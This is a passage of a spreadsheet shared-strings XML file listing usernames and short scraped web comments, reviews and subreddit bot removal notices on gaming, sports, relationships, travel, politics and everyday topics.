    <t>Yep. I get notifications on my phone just like a text and it takes all of 10 seconds. I'm really not sure what your point is.</t>
  </si>
  <si>
    <t>Lethologica</t>
  </si>
  <si>
    <t>Bloodstained is on PC GP as well? Hell yeah.</t>
  </si>
  <si>
    <t>Shatenburgers</t>
  </si>
  <si>
    <t>You asked me what I saw, not what happened</t>
  </si>
  <si>
    <t>Nickoladze</t>
  </si>
  <si>
    <t>Has anybody figured out how to get the chests in the vaults to respawn? I beat the story and went into Mayhem 1 and I was able to go loot the chests once more after beating the guardian boss but if I farm the boss they never open again, even if I load another character save and load back.</t>
  </si>
  <si>
    <t>Groucho</t>
  </si>
  <si>
    <t>Mine gets gummed up often, as we don't use the shower and rarely the sink. So the only thing that goes in is daily tooth brushing and AC water. I have to keep an eye on it. I just flush it out with some hot water or wipe away all the black scum every month or so. The float gets nasty and stuck often.</t>
  </si>
  <si>
    <t>Zenidiller</t>
  </si>
  <si>
    <t>What was the saying? Red skies in the morning, sailor's warning. Red skies at night, sailor's delight.</t>
  </si>
  <si>
    <t>dikramohamed_</t>
  </si>
  <si>
    <t>This Garnier makeup remover is amazing, it is effective and its effect on the face is good. It removes make-up and cleanses the skin from everything, it also refreshes the skin of the face. Lots of advantages in one vial, long enough. This makeup remover is great to use to get rid of any impurities on the face after removing the makeup so that the face is not affected by the makeup residues that are consistent skin. Garnier SkinActive Micellar Cleansing Water All-in-1</t>
  </si>
  <si>
    <t>Communist_Buddha</t>
  </si>
  <si>
    <t>Sounds like the sun, from that one Rick and morty episode, where it screams when the sun rises</t>
  </si>
  <si>
    <t>fahimabid07</t>
  </si>
  <si>
    <t>Does he like Stranger Things? Looks inspired by the show.</t>
  </si>
  <si>
    <t>trystanthorne</t>
  </si>
  <si>
    <t>This might be the best analogy I've ever heard.</t>
  </si>
  <si>
    <t>avael273</t>
  </si>
  <si>
    <t>Publisher greed led to piracy, regional restrictions high dvd/cd prices despite digital distribution etc. I think that streaming is next logical step. Streaming was not possible before because of low internet availability and reach, low speeds, expensive pc and such. Media publishers were the internet for cd/dvd/bd but their role is no longer as critical, yet they are very slow to adapt, if they reacted in time we would have one service for movies and music streams/digital copies. Currently we have dozens of companies competing for the streaming market.</t>
  </si>
  <si>
    <t>ohkeycaps</t>
  </si>
  <si>
    <t>I have a product I sell, that is custom made to order. So when it is purchased, someone needs to 3D print it, and then someone needs to assemble it. I want these people to see the orders - but not all my orders.</t>
  </si>
  <si>
    <t>theroguex</t>
  </si>
  <si>
    <t>"Domestic Girl" You missed part of the title there.</t>
  </si>
  <si>
    <t>IGotAHugePeckah</t>
  </si>
  <si>
    <t>Bisping learned the hard way that you don't fuck with the GOAT</t>
  </si>
  <si>
    <t>Opheltes</t>
  </si>
  <si>
    <t>Yes. The atomic mass (protons + neutrons) defines the isotope number. A single atom of element X containing Y neutrons would be X+Y.</t>
  </si>
  <si>
    <t>Uppercut_OMalley</t>
  </si>
  <si>
    <t>What, you didn't keep the one from the training tutorial when you first start the game?</t>
  </si>
  <si>
    <t>ArsenalMetro</t>
  </si>
  <si>
    <t>We're back in the top 4 FWIW. Ahead of West Ham on goals scored.</t>
  </si>
  <si>
    <t>Alyssmiss</t>
  </si>
  <si>
    <t>The one you have as your main photo now is the best one</t>
  </si>
  <si>
    <t>someninjaguy</t>
  </si>
  <si>
    <t>I could shed some light.... You like the chasing phase and since it wasnt your husband but another taken man there was the taboo and lust for something forbidden. From that you completely neglected your husband. No special dinner or flowers or knock on the head was going to keep you from being selfish and getting what you wanted. You even state how your husband treated you like royalty and you couldnt reciprocate that to him. Then while in the affair fog you fog out your husband knew. Not that that really affected you because you bullshitted yourself into believing no one was getting hurt Then the realization (maybe a glimpse from empathy) that you did hurt him when you realized that you're replaceable and that your husband plans on starting his own affair (to try to even the playing field that you created with the imbalance) Now its damage control mode because you're going to be in a broken marriage or divorced. That what you took for granted no longer is going to sit by and be your doormat. That you've lost something and long term and special for a man that has his own wife and family that he is neglecting. I think your remorse or wake up call is that you realize you've lost and lost big. Hopefully its enough to finally take ownership and realize you're not special and not irreplaceable. That there will be another woman eager to have a faithful and diligent husband that she will proud to be with and will take care of him where your behaviors indicate if your not treated like a queen or not in the beginning parts of a relationship, you're willing to look outside for that excitement That really you arent any better than anyone else and are morally bankrupt in how you treat other human beings</t>
  </si>
  <si>
    <t>garrettcurrie</t>
  </si>
  <si>
    <t>I’ve been trying to make a conveyor belt for so long. Super difficult.</t>
  </si>
  <si>
    <t>&gt;&gt;15641257 Are certifications as effective as a degree? I've been studying to take my A+ cert for a month or so and am pretty close to taking the test. I don't really give a shit what the job is I just don't want to make mediocre money and I'm willing to work for it.</t>
  </si>
  <si>
    <t>worldfamoushobgoblin</t>
  </si>
  <si>
    <t>He's probably lonely, like you said. In the meantime, I recommend the youtube channel ShadowTheRat, she has some good videos on how to hand tame skittish rats</t>
  </si>
  <si>
    <t>heygos</t>
  </si>
  <si>
    <t>I k no own I shouldn’t be laughing but that was exactly the same thought that came to my Ming when I saw it</t>
  </si>
  <si>
    <t>GlutenMakesMePoop69</t>
  </si>
  <si>
    <t>And filming it yourself.</t>
  </si>
  <si>
    <t>pokehercuntass</t>
  </si>
  <si>
    <t>Wow. Well done, Brave. Glad someone is stepping up to the plate and holding anyone accountable for anything at all these days.</t>
  </si>
  <si>
    <t>peetahzee</t>
  </si>
  <si>
    <t>Wait, and THAT's not roughing the paaser??????</t>
  </si>
  <si>
    <t>marcuszuccerbus</t>
  </si>
  <si>
    <t>SCP-049 has breached containment</t>
  </si>
  <si>
    <t>Navinavinavi7</t>
  </si>
  <si>
    <t>Yeah, no. Again, all oneshot before they even have a chance to proc. Maybe one proc if you're lucky. Man I'd love to see the chumps you must face if guild wars is that easy.</t>
  </si>
  <si>
    <t>igloo15</t>
  </si>
  <si>
    <t>Not sure that makes sense to me. If there was a bug in NET Core build tools that showed up in Visual Studio then their explanations is really weird for this whole thing. Couldn't they just say "Hey we found a bug in our NET Core build tools that required us to make a new version of NET Core. This bug showed up when testing the new NET Core with Visual Studio."</t>
  </si>
  <si>
    <t>ZayanWatchel</t>
  </si>
  <si>
    <t>We believe in the natural law, which dictates that the ends of sexuality ought to be a child, as that is the *telos* of the sexual act. This ought too to be done within the sacrament of marriage, as that is the sacrament established by the church for the raising of children. We arent against sex.</t>
  </si>
  <si>
    <t>bitch_whip_bill</t>
  </si>
  <si>
    <t>I used to say 'or something stupid' occasionally at the end of sentences. She would reply, 'a zebra in a top hat' or 'a penguin buying a sofa' I eventually stopped saying it</t>
  </si>
  <si>
    <t>Amann029</t>
  </si>
  <si>
    <t>And just my luck, won’t be able to confirm ovulation now that I have a fever 🤦🏻‍♀️</t>
  </si>
  <si>
    <t>Yourenotthe1</t>
  </si>
  <si>
    <t>I've seen this headline 3 times now</t>
  </si>
  <si>
    <t>DingDongWhoDis</t>
  </si>
  <si>
    <t>You have no idea what you're talking about. People think this person created everything on his/her own, and it was presented as an original illustration. If you don't see an issue with that, you should at least keep your mouth shut while the adults discuss. Whiny? This is a matter of ethics, and you are not comprehending the problem. Go away.</t>
  </si>
  <si>
    <t>&gt;&gt;477428712 He's trying to make a Hollywood out of his videogame</t>
  </si>
  <si>
    <t>&gt;&gt;68247135 It'd probably end up looking more like a Witcher school or even just a more specialized mercenary company.</t>
  </si>
  <si>
    <t>elitejustice93</t>
  </si>
  <si>
    <t>Being sarcastic on a topic which I believe is VERY sensitive for many people of the 2 countries.</t>
  </si>
  <si>
    <t>Kiara</t>
  </si>
  <si>
    <t>The room was not clean. We did not have towels and toilet paper but the most uncomfortable was that the toilet was used. The floor was very dirty, we decided to walk with shoes, we understand that the room was not ready to deliver. We notified all and they provided towels and paper. I always bring with me disinfectant wipes and I cleaned the toilet and flush it. The experience was uncomfortable. Comfortable place. Attentive staff. Easy location. Includes private kitchen and parking. Stayed in September 2019</t>
  </si>
  <si>
    <t>jennifer m.</t>
  </si>
  <si>
    <t>Love it so smooth so wonderful and rich almost cookie bourbon</t>
  </si>
  <si>
    <t>Nikcara</t>
  </si>
  <si>
    <t>Yes, but part of that mandatory counseling will include checking in on the kid. If the kid shows up to a counseling session covered in bruises, that triggers an investigation. If the kid tells their counselor they’re still being abused, they’ll be listened to and it can also trigger an investigation. If it’s determined the parents are being abusive, that triggers further action. If it’s determined that the kid is now in danger, that triggers removal (typically starts as temporary removal, so the parent can get the kid back, but can escalate depending on the parents’ behavior). It’s not like CPS will just wash their hands of a shitty situation just because the kid was sent to a therapist. They’re not so stupid that they don’t realize that some shitty parents will escalate their bad behavior in response to getting called out for it.</t>
  </si>
  <si>
    <t>Clarkey11</t>
  </si>
  <si>
    <t>There is a living legend named YBK who used to post here but stopped because of all the degenerate douchebags on this thread who harassed him (like they always do when they blindly tail someone and lose). I would recommend going to YBKpicks.com if you’re looking for a legit dude to tail.</t>
  </si>
  <si>
    <t>JaronK</t>
  </si>
  <si>
    <t>Remember that recording people without their consent may be illegal in your state. This may be a very terrible idea.</t>
  </si>
  <si>
    <t>hystericallymad</t>
  </si>
  <si>
    <t>Just received the one I ordered. Integrated as expected with no issues. Now I need to finish the room its going in so I can install it.</t>
  </si>
  <si>
    <t>AutoNewspaperAdmin</t>
  </si>
  <si>
    <t>[IE] - Why corporate social responsibility is a core element for some businesses | Irish Times</t>
  </si>
  <si>
    <t>O_u_blocked_me</t>
  </si>
  <si>
    <t>They didn't even try to white wash it into man and women " The recognition of “they” as a singular, non-gender-specific pronoun comes as its usage grows in popularity, especially among people who identify as neither male nor female. However, these adoptees frequently face critics who claim the usage is not “grammatically correct”.</t>
  </si>
  <si>
    <t>Your post has been removed automatically because all images, except for infographics, must be submitted in text posts. If you submitted an infographic, please message the mods by [clicking here](http://www.reddit.com/message/compose?to=%2Fr%2Fleagueoflegends), otherwise [click here](http://reddit.com/r/leagueoflegends/submit?selftext=true) to resubmit your image the proper format. If you're not familiar with the subreddit rules, you can read them [here](http://reddit.com/r/leagueoflegends/w/subredditrules). *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/leagueoflegends) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>ourbestlife</t>
  </si>
  <si>
    <t>Hi I would like to join. 61 yrs. 5'5" Round 90 SW: 160.9 Round 90 GW: 158.6 pretty ambitious for me.. but I am giving it a go. 09/20 160.4 09/21 161.4 failed to count cals 09/22 162.1 09/23 09/24 09/25 09/26 09/27 09/28 09/29 September 22, 2019 3:00PM</t>
  </si>
  <si>
    <t>plantgrem</t>
  </si>
  <si>
    <t>i wouldn't wish that monstrosity on anybody, your poor pc, was his monster dong part of his tragic backstory?</t>
  </si>
  <si>
    <t>Atharvkulkarni0</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>anonymous</t>
  </si>
  <si>
    <t>Idk who that is lol</t>
  </si>
  <si>
    <t>Acheros</t>
  </si>
  <si>
    <t>problem with that is HH is kind of out of my budget and nobody around my area plays it anyway</t>
  </si>
  <si>
    <t>kinnie101</t>
  </si>
  <si>
    <t>pal got dared to get his balls waxed. i fucking hated this guy. he was constantly talking down to people and always knew the answer (haha he was almost mever right) and had to one up everyones story. so no one wants to touch him but i jumped up like yes please. it was brilliant when i ripped that wax strip off and he just wheezed and silently cried. (btw this was like 15 years ago and we were all young dumb and really into jackass....)</t>
  </si>
  <si>
    <t>almostbad</t>
  </si>
  <si>
    <t>I love the subtitles, I hope this mean WWE is going to lighten up on their only english promo nonsense.</t>
  </si>
  <si>
    <t>AnderLevi</t>
  </si>
  <si>
    <t>Build a go cart</t>
  </si>
  <si>
    <t>thiagosilva2</t>
  </si>
  <si>
    <t>The curse is broken. Lucas has started FUT at an 83 rating</t>
  </si>
  <si>
    <t>spockers</t>
  </si>
  <si>
    <t>No, it's the opposite if untethered.</t>
  </si>
  <si>
    <t>The only Greek here</t>
  </si>
  <si>
    <t>Wow, Arsenal (my pick)! 2 goals in the last 10 minutes with 10 men. Lucky me! I'm still alive. OK, for the next round I'll stay in London and pick: Tottenham edit: I hope it's ok that I already pick for the 2nd round? I may forget it otherwise</t>
  </si>
  <si>
    <t>klok_kaos</t>
  </si>
  <si>
    <t>i see what you're saying, but with defense, there are better frames to use (limbo being the obvious one, since you just auto win), with survival, there are better frames to use even with the variety of what you're trying to do, the dome is handy, but it's not mobile like nekros with a cyath, and if you're just trying to kill fast you can use saryn or anything with a kripath riven. there is a reason to use khora for survival though, and that"s if you want to be afk lazy, and that's valid, but it doesn't mean she's optimal. it's like saying ash is godly for solo endurance survival, which he kind of is... unless you compare him to ivara, and then there's no contest anymore because she just auto wins. additionally khora doesn't like to get hit very much, and that suffers a lot at later levels where you really have to start relying on operator with magus lockdown.</t>
  </si>
  <si>
    <t>dasavag</t>
  </si>
  <si>
    <t>It’s actually all stock visual I took the exhaust off and it still does it. Could it be a glitched our car?</t>
  </si>
  <si>
    <t>jeetelongname</t>
  </si>
  <si>
    <t>We could go gator sheddings I guess</t>
  </si>
  <si>
    <t>empyfunk</t>
  </si>
  <si>
    <t>looks like suicide by cop. pulls over, grabs knife, and immediately exits vehicle.</t>
  </si>
  <si>
    <t>footpath</t>
  </si>
  <si>
    <t>Quote: : Tigerfursonly69 said: K so there is a difference in a single cell isolation and a monoculture? Wouldn't a monoculture just be like WBS inoculated with a single cell isolation? Thus mono culture? I did answer those questions. As far as why your spawn stalled, there can be many reasons. Overcooking, not straining thoroughly, competition, unhealthy master spawn... maybe they were colonizing where you couldn't see? What made you think they were 'taking too long'? Did a a month or so go by? Or was it just not timely enough for your agenda? I realize there are ideal time frames suggested in most of the procedures that you'll read, but those are suggested by experienced people who've learned how to work with the culture. It sounds like, most likely, you introduced some contamination in your G2G process. Be that from the master spawn or your sterile technique, could not say. That you opened bags not fully colonized, the inference would be: both. The silver lining is that they seem to have recovered from your shakeup. Roll with that. Give it time.</t>
  </si>
  <si>
    <t>yamomstoesi</t>
  </si>
  <si>
    <t>Appreciate the help!</t>
  </si>
  <si>
    <t>Justbreathe2000</t>
  </si>
  <si>
    <t>The only thing I'd change is the Canadian Rockies order. Do the 3 nights in Lake Louise, then the nights in Jasper and finally the nights in Banff. Banff and Lake Louise are only 45 mins apart. I'd hate to have to pack up everything just to move 45 mins down the road.</t>
  </si>
  <si>
    <t>octokit</t>
  </si>
  <si>
    <t>Did you install all OS updates and (most importantly) restart your computer? I have the same headset and have had to restart daily to get the headset to work for the past few weeks.</t>
  </si>
  <si>
    <t>fekir_in_debuchy</t>
  </si>
  <si>
    <t>Title updates for FIFA always come first on PC (Origin), then on consoles a week after, hope that answers your question, now lets keep the thread on topic - give us face updates all-in-one patch EA (PL Promoted teams, PSG, Atletico new signings scans, missing scans, anything extra you have in your sleeves) !</t>
  </si>
  <si>
    <t>gmlogan</t>
  </si>
  <si>
    <t>Quote: Originally Posted by sagarasandaru Anybody else have issues with SmurfKernal not able to change screen brightness on 09/26 build? I had that problem using the IllusionKernel, wondered if it's to do with DC Dimming that OnePlus added and these kernels implemented support for.</t>
  </si>
  <si>
    <t>ScruffiestDog</t>
  </si>
  <si>
    <t>Wow. Props to you for having so much resolve. I'm also super impressed that your first race was Olympic distance and that you just jumped right into it. A lot can go wrong in a first race (well, any race really), but sticking to it and having a hell of a time is worth it because a lot also goes right. Congratulations, and keep kicking butt!!!</t>
  </si>
  <si>
    <t>Botcog</t>
  </si>
  <si>
    <t>Hello – Your post has been removed for violating our rules. The rule this post violated is outlined below. *** [**Rule 5: No direct promotion**](https://www.reddit.com/r/PUBATTLEGROUNDS/wiki/rules#wiki_rule_5) *** If you feel this post was removed in error/unfairly, please feel free to either respond to this comment or [Message Moderators](https://www.reddit.com/message/compose?to=%2Fr%2FPUBATTLEGROUNDS).</t>
  </si>
  <si>
    <t>honestAndResponsible</t>
  </si>
  <si>
    <t>Because we fail to ask for help.</t>
  </si>
  <si>
    <t>Alpiney</t>
  </si>
  <si>
    <t>Often when the phones are new you can find some interesting deals. Black Friday often you can find lots of good deals too.</t>
  </si>
  <si>
    <t>Marcus_McTavish</t>
  </si>
  <si>
    <t>Welcome to the right wing side of this sub, where all non-white Americans or non-americans are the cause of all our problems. And that we should hate them, rather than change anything or admit anything</t>
  </si>
  <si>
    <t>I_am_so_smrt_2</t>
  </si>
  <si>
    <t>Poor spelling and ass cracks.</t>
  </si>
  <si>
    <t>jleisure</t>
  </si>
  <si>
    <t>Thanks, I try my best. Have a wife and 2 kids that depend on me being safe.</t>
  </si>
  <si>
    <t>Hamsternoir</t>
  </si>
  <si>
    <t>Brexit</t>
  </si>
  <si>
    <t>excelevator</t>
  </si>
  <si>
    <t>This post has been removed due to **[Rule 1](/r/excel/wiki/sharingquestions#wiki_rule_1) - Poor post title.** The title should be your question/issue, not your supposed solution or just a function mention, or a vague how to, and is generally summed up in a sentence in your question. Please post your questions with a more specific title. [Long example](/r/excel/comments/6jg5hz/i_have_two_columns_which_specify_the_start_cell/?st=j5z4ms4n&amp;sh=c7e9fe1d) and [short example](/r/excel/comments/6rnz8l/conditional_formatting_excluding_empty_cells/?st=j5z4a7k1&amp;sh=a6119df2) of a good post. This rule is enforced to promote high quality of post titles in the community and to ensure questions can be easily navigated and referenced for future use. See the [Posting Guidelines](https://www.reddit.com/r/excel/wiki/sharingquestions) for more details, and tips on how to make a great post.</t>
  </si>
  <si>
    <t>Bluish_Guy</t>
  </si>
  <si>
    <t>Is it actually free or is it one of those that it is free for some period and then they charge you</t>
  </si>
  <si>
    <t>NancyD</t>
  </si>
  <si>
    <t>I’d look for a duvet cover; sometimes that’s less expensive. If you sew, you might find fabric or even sheets on sale that you can cover a comforter with. Of the photos here, one has just green and white, which may not work if it doesn’t go with the green of your walls. It’s why I wouldn’t go with your solid green choice. The other bedspread brings in green, cream, and a touch of blue violet and would be easier to work with. Search online for “green and yellow bedding.” There’s plenty out there.</t>
  </si>
  <si>
    <t>&gt;&gt;265006670 &gt;Johnny &gt;Dodged Clockwork &gt;&gt;265006840 The region that kicks your low execution dodging ass</t>
  </si>
  <si>
    <t>tenamonth</t>
  </si>
  <si>
    <t>NRS games usually drop off *hard* after a short time, and MK11 is already seeing many players leave and moving onto the next big AAA game. The moment there is the first whiff of news about IJ3/MK12, people will forget 11 ever existed, like what happened with IJ2.</t>
  </si>
  <si>
    <t>littlevioletx</t>
  </si>
  <si>
    <t>Can I ask what you think generally of sex/dating etc?</t>
  </si>
  <si>
    <t>i want to lick sayo and her sister</t>
  </si>
  <si>
    <t>Yagura18</t>
  </si>
  <si>
    <t>Women are just men with bobs and vagena Change my mind</t>
  </si>
  <si>
    <t>sharpen_up</t>
  </si>
  <si>
    <t>Love it! Sounds like you have some good options. We are going to Portugal right after the wedding! It checked all the boxes for us: inexpensive, good food, good wine, beautiful scenery, fun cities, and somewhere neither of us had been before. There’s plenty to do and explore without feeling like we HAVE TO see everything.</t>
  </si>
  <si>
    <t>DJ23</t>
  </si>
  <si>
    <t>Awesome Phone! Love the front portrait camera! Holds a great charge!</t>
  </si>
  <si>
    <t>Roweline</t>
  </si>
  <si>
    <t>Someone ripped out my collarbone.</t>
  </si>
  <si>
    <t>&gt;&gt;110214115 Episodes boarder before Trump vs episodes boarded after Trump. That's really it.</t>
  </si>
  <si>
    <t>4dFord/SC</t>
  </si>
  <si>
    <t>You might check with Lin Stacey, the EFV8 Club's tool advisor. He's at LinStacey@sbcglogal.net</t>
  </si>
  <si>
    <t>Drunkiller420</t>
  </si>
  <si>
    <t>No, most good wedges are milled and it’s better for ‘feeling’ your chips.</t>
  </si>
  <si>
    <t>kattoon29</t>
  </si>
  <si>
    <t>We need a offensive sub now! If we lose I would rather lose with Dom, Tesho, Muller and Nani. Just go for it.</t>
  </si>
  <si>
    <t>Stretch132</t>
  </si>
  <si>
    <t>Thank you for this. There are areas here we both need to work on. Congratulations on 2 years sober. :)</t>
  </si>
  <si>
    <t>2roK</t>
  </si>
  <si>
    <t>lmao someone is worried about his account.</t>
  </si>
  <si>
    <t>Raistlin43084</t>
  </si>
  <si>
    <t>The avengers seem appropriately powered. It’s not like when there is an “avengers level event” Fury calls the avengers instead of shield medic....oh...wait...</t>
  </si>
  <si>
    <t>tunaburn</t>
  </si>
  <si>
    <t>That's the interesting thing. Tony doesn't move like a normal fighter. He will do the best against khabibs boring wrestlefuck that anyone has done. Hopefully enough to win.</t>
  </si>
  <si>
    <t>Derek_Cross</t>
  </si>
  <si>
    <t>Which version of InDesign and OS? I assume you are not printing directly from InDesign but from a PDF. How are you creating your PDF from your InDesign document, I mean are you using one of the Acrobat PDF presets that comes with InDesign?</t>
  </si>
  <si>
    <t>Tokkiman</t>
  </si>
  <si>
    <t>Booze Bros on Smithdown Rd and the Liquor Store on Lodge Lane both sell various Polish beers</t>
  </si>
  <si>
    <t>tjeulink</t>
  </si>
  <si>
    <t>If they got out of their relationship what they needed they wouldn't cheat ;) it really is that simple, because otherwise there is no "reason" to cheat.</t>
  </si>
  <si>
    <t>DigitalDrifter</t>
  </si>
  <si>
    <t>Notice you don't see any of the board libs commenting on this. They even know these asylum claims are bullshit. If your country is putting you in danger, once you leave, you would be requesting asylum in the first country you come to. These people are bypassing Mexico, because they know they can get government handouts here in the U.S. They are spitting in the faces of people who follow our immigration laws. They want to jump ahead of the lines by using the asylum claims.</t>
  </si>
  <si>
    <t>barmmerm</t>
  </si>
  <si>
    <t>Then they walked into a bar...</t>
  </si>
  <si>
    <t>Hey Trainer, Looks like you’re trying to share or find Trainer codes for the purpose of trading or sending gifts in PokémonGO. To find trainers (near and far) please go to /r/pokemongotrades to prevent the sub from flooded with trade requests and adding friends, thank you for your understanding. If this message was triggered by mistake, please [contact the mods](https://www.reddit.com/message/compose?to=%2Fr%2Fpokemongo) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/pokemongo) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>getsetgofit</t>
  </si>
  <si>
    <t>“Don’t ever start gym, because the moment you stop it, you are going to gain weight!”, “ All those muscles are going to be stored as fat once you stop gymming!” Do these pieces of advice sound familiar? Let’s understand why some people put on weight after stopping their gym routine.</t>
  </si>
  <si>
    <t>Aethien</t>
  </si>
  <si>
    <t>It is but it'd be 12 or 8 for Hamilton between 4th and 6th with 4th or 5th for Bottas. Bottas slowing down cost him 2 points and gained Hamilton 4 so +2 total for Merc and -2 for Albon and RBR.</t>
  </si>
  <si>
    <t>IceDragonzzzz</t>
  </si>
  <si>
    <t>Reposting because I had a spoiler in the title (oops.) Well, I have a theory about the Aeon Hero, Galacta Knight. As I've heard, (because I've had this part spoiled to ME) is that Galacta was actually one of the 4 heroes that had vanquished Void Termina aeons ago. (thus, the title "Aeon Hero") He could've been a noble, chivalrous warrior. But, some kind of force, (presumably, Dark Matter) has driven him mad, which caused him to create mass destruction, which then lead to him being sealed away, for fear his power was too great. If this is the case, that would explain why he is MAD every time you summon him. And, it probably doesn't help that every time he appears, he gets defeated, which just intensifies his craziness. Well, that's MY theory. What do you guys think? If you have your own theories, feel free to share!</t>
  </si>
  <si>
    <t>davidducker</t>
  </si>
  <si>
    <t>Very narrative tho. Not for everyone.</t>
  </si>
  <si>
    <t>Beaulieu100</t>
  </si>
  <si>
    <t>Trick question. They both don't work</t>
  </si>
  <si>
    <t>Minds_Sash</t>
  </si>
  <si>
    <t>I was always baffled that they didn't release the rest as DLC. I mean they practically had the rest almost finished and all the time of the world to release it as DLC content after the main release.</t>
  </si>
  <si>
    <t>isandrg</t>
  </si>
  <si>
    <t>Yea will have to try it out then.</t>
  </si>
  <si>
    <t>wolverine-claws</t>
  </si>
  <si>
    <t>Both examples listed are of people that bear no resemblance to one another but their skin colour. You figure it out mate.</t>
  </si>
  <si>
    <t>klol246</t>
  </si>
  <si>
    <t>Making him feel like such a bad kid now</t>
  </si>
  <si>
    <t>Agree, there are genuinely smart and hard working individuals who are stuck in the queue, but they are stuck in the queue because countless number of Indians applied before them. Country cap should exist. We should not give away all green cards to one country, especially bearing in mind how many of them were stolen from talented people from another countries.</t>
  </si>
  <si>
    <t>jmputnam</t>
  </si>
  <si>
    <t>Judging by the broken sign also lying on the sidewalk in the Tmes' cover photo, Seattle might need a way to hold random vandals accountable for trashing anything on or near the sidewalk. Passing through the International District before dawn, surely I'm not the only one who has seen street people tipping over rows of neatly parked, freshly charged bikes...</t>
  </si>
  <si>
    <t>mskatme0w</t>
  </si>
  <si>
    <t>Haha yes! Exactly</t>
  </si>
  <si>
    <t>&gt;&gt;22052820 it's not just minecraft though, yesterday she was having issues with super bunny man as well, and i think PW too people are suspecting she has the monitor plugged directly onto the mobo</t>
  </si>
  <si>
    <t>A11enalex</t>
  </si>
  <si>
    <t>That’s how the city fills the cracks on the sidewalk. Cheap fix 0 labor.</t>
  </si>
  <si>
    <t>Aliviano</t>
  </si>
  <si>
    <t>This already screams enxp at the beginning. There's a lot of Ne and Si statement So my safe bet is you being an enfp</t>
  </si>
  <si>
    <t>Fruity pebbles and toast</t>
  </si>
  <si>
    <t>exjr_</t>
  </si>
  <si>
    <t>I wonder if it is OLED black for OLED devices. What phone you have? Btw, link that screenshot on your post for more visibility</t>
  </si>
  <si>
    <t>Leadbasedtoys</t>
  </si>
  <si>
    <t>I'm not missin this model train convention 'cause you're doin greasy things</t>
  </si>
  <si>
    <t>MichiAngg</t>
  </si>
  <si>
    <t>I openly admit it's a loose use of the word, but there's plenty of examples of it being used the way I'm using it. Nothing is 100% free in every aspect of the word, and I think most people over the age of 10 are smart enough to know that.</t>
  </si>
  <si>
    <t>THExLASTxDON</t>
  </si>
  <si>
    <t>Not sure, but I assume it's still going on judging from Twitter comments. Also, there's like 5 or so weirdo Sony fanboys that are in a little group and they message each other when something they don't like gets posted here. It's hilarious.</t>
  </si>
  <si>
    <t>MountainStingray</t>
  </si>
  <si>
    <t>Let's assume that each passenger car has a weight of 60 tons (comparable to Amtrak cars). At the end of the clip, it looks like they are showing 5 full cars, so 300 tons total. Let's assume it's going 100 mph (160 km/h). Then the total energy of the train cars is 1/2 \* 272,000 kg \* (45 m/s)² = 275 MJ. The gargoyles stop the train in about 10 seconds, so assuming constant acceleration, the value of a is 45 m/s / 10 s = 4.5 m/s². F = ma so f = 272,000 kg \* 4.5 m/s² = 1.22 MN. If there are 3 thrusters, then each produces a little over 400 kN. That's 90,000 lb force each. Assuming that a person wearing one of these has a projected frontal area of 1 m² and a drag coefficient around 1.0, they would be able to achieve velocities around 810 m/s or 1,800 mph or about Mach 2.3. It would be very hard to stay alive at such insane speeds. Physically, something that produces that much thrust for any significant duration would need a LOT more fuel and thus need to be a lot bigger. For reference, this is about the same thrust as each jet engine on the newest, most powerful commercial airliners, like the [GE-90.](https://en.wikipedia.org/wiki/General_Electric_GE90) Also worth noting that what is depicted in the cartoon would basically require a 747 at max thrust to provide this much force.</t>
  </si>
  <si>
    <t>milla_highlife</t>
  </si>
  <si>
    <t>Reach for something that's not chocolate when you are hungry. Something more nutritious. Even if it's a piece of fruit of some shit. And the trick about hunger is it's ok to be hungry. You're allowed to not be full all the time. It's ingrained in our society that if you are hungry, something is wrong, but it's not true. Just embrace the hunger.</t>
  </si>
  <si>
    <t>Alter_Mann</t>
  </si>
  <si>
    <t>If he would agree to squad wages why not? With Hendo playing more advanced recently we've got no real depth at DM after Fab and with so many games some rotation would be good, especially when we want to have longer runs in the cups...</t>
  </si>
  <si>
    <t>Rost-Light</t>
  </si>
  <si>
    <t>Good luck to navigate the Coil, fellow traveler. Use this holy charm wisely :)</t>
  </si>
  <si>
    <t>KingKitttKat</t>
  </si>
  <si>
    <t>When you steal Malora's armor.</t>
  </si>
  <si>
    <t>deepseadiver119</t>
  </si>
  <si>
    <t>All of the “get her back” options are tempting, but this is the most practical deal-world advice. Very nicely worded.</t>
  </si>
  <si>
    <t>Woodhouse Select</t>
  </si>
  <si>
    <t>No idea why the photos in the original post aren't working (and I can't edit it), but here are a few that should work. Image Unavailable, Please Login Image Unavailable, Please Login Image Unavailable, Please Login Image Unavailable, Please Login Image Unavailable, Please Login</t>
  </si>
  <si>
    <t>planet_tyler</t>
  </si>
  <si>
    <t>No one will be this cool. Ever.</t>
  </si>
  <si>
    <t>jonnycruz666</t>
  </si>
  <si>
    <t>4 points. You get 3 for the goal and 1 for the pp goal</t>
  </si>
  <si>
    <t>larry_the_loving</t>
  </si>
  <si>
    <t>To play devils advocate, The official explanation for the Tunguska event is a very light, dust asteroid, which exploded rather than directly making impact. Similar to the other, more recent one over Russia. And exploding dusty asteroid wouldn't be expected to leave much behind, and certainly not in easy to find craters, so it's not really unexpected that there aren't bits lying around from it.</t>
  </si>
  <si>
    <t>Frouthefrou</t>
  </si>
  <si>
    <t>Do you mean there are few English books translated to Japanese, or English books in English? I’m planning on buying a lot of English fantasy books in Japanese. You can’t find many of them in digital format on amazon. :(</t>
  </si>
  <si>
    <t>earlgray79</t>
  </si>
  <si>
    <t>Yes. Add to that a symptom of the problem -- you have a housing voucher, but you can't find a landlord who accepts them in some areas of the city. Makes it difficult to live near work or good schools, even though there are plenty of residential areas around.</t>
  </si>
  <si>
    <t>_o__0_</t>
  </si>
  <si>
    <t>Thats not cool. Some crafty ones are behind Glupteba.</t>
  </si>
  <si>
    <t>Bischenzli</t>
  </si>
  <si>
    <t>Oh goodness! That's crazy. I was thinking about stopping opks and just do bbt and bd every other day this cycle since I'm starting to stress out a little.</t>
  </si>
  <si>
    <t>roots-rock-reggae</t>
  </si>
  <si>
    <t>&gt;Cyclists should be careful, but at the end of the day, they're the ones paying the ultimate price if they're not. All the more reason to be careful then, no?</t>
  </si>
  <si>
    <t>oldbkenobi</t>
  </si>
  <si>
    <t>I wouldn’t expect any less from KDKA - another story manipulated to rile up the boomers in Murrysville and the South Hills so they share it on Facebook with their friends.</t>
  </si>
  <si>
